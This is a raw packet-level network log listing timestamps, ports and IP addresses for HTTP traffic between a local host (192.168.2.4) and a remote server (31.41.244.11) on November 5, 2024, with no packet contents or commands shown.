Nov 5, 2024 18:46:11.154508114 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.154544115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.154545069 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.154555082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.154596090 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.154619932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.154629946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.154654980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.154664040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.154675961 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.154675961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.154700041 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.154742002 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.156008959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156021118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156030893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156058073 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.156076908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156079054 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.156089067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156131983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.156409025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156419039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156430006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156447887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.156467915 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.156480074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156490088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156496048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156502962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156537056 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.156630039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156641006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156651020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156661034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156672955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156677961 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.156687021 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.156719923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.156923056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156932116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156943083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156953096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156964064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156965017 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.156975031 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156984091 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.156985044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.156995058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157008886 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157015085 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157041073 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157068968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157078028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157119989 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157233953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157243967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157254934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157264948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157273054 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157275915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157284975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157289982 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157295942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157308102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157313108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157319069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157321930 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157331944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157344103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157356977 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157388926 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157489061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157499075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157509089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157516956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157526970 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157529116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157540083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157546043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157551050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157561064 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157577038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157602072 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157740116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157752037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157763004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157792091 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157807112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157892942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157903910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157924891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157932997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157938004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157943964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157948971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157954931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157963991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157967091 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157974958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157980919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.157985926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.157996893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.158003092 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.158018112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.158032894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.158283949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.158324957 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.158333063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.158343077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.158353090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.158368111 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.158404112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.166383982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166395903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166408062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166455984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166456938 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.166469097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166480064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166503906 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.166518927 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.166621923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166631937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166671038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.166686058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166697979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166718960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166732073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166742086 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.166742086 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.166749954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.166774988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.166775942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166786909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166799068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166807890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166821003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166834116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.166878939 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.166897058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166917086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166929960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166938066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.166940928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.166999102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.166999102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.167012930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167078018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.167097092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167109013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167119980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167129040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167140007 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.167145014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.167169094 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.167176008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167187929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167201042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167213917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167221069 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.167227983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167232037 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.167277098 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.167306900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167327881 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167392015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.167505980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167516947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167527914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167540073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167551041 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.167553902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167557001 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.167565107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167577028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167589903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167591095 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.167613029 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.167633057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167639017 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.167700052 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.167721987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167735100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167753935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.167793036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.167818069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167829037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167845011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167855978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.167865038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.167885065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.167987108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168001890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168034077 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168164968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168178082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168189049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168200016 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168200970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168212891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168225050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168229103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168242931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168252945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168262959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168268919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168276072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168286085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168292046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168299913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168308020 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168309927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168323040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168343067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168354034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168356895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168366909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168375969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168376923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168396950 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168396950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168415070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168423891 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168426991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168437958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168448925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168458939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168462038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168476105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168490887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168502092 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168524027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168535948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168543100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168548107 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168555021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168569088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168572903 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168582916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168637037 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168728113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168737888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168749094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168761969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168770075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168772936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168785095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168786049 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168797016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168804884 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168807983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168818951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168839931 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168860912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168869019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168874025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168885946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168896914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168905973 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168911934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.168915033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.168951988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.169097900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.169111013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.169121027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.169137955 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.169188023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.198465109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.198474884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.198484898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.198508978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.198533058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.198534012 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.198545933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.198585033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.198704004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.198714018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.198724985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.198753119 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.198801041 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.198812008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.198823929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.198833942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.198848009 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.198851109 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.198877096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.198888063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.198898077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.198899984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.198909044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.198961020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.198972940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.198973894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.198983908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199018002 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199054003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199079990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199090958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199100971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199110985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199120998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199135065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199150085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199156046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199171066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199183941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199189901 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199193001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199227095 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199239969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199245930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199270964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199280977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199296951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199327946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199362040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199373960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199383020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199393034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199413061 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199413061 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199470997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199506044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199517965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199527979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199537039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199552059 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199553967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199563980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199573994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199578047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199584961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199595928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199606895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.199609995 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199618101 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199655056 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199655056 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.199836016 CET	80	49804	31.41.244.11	192.168.2.4
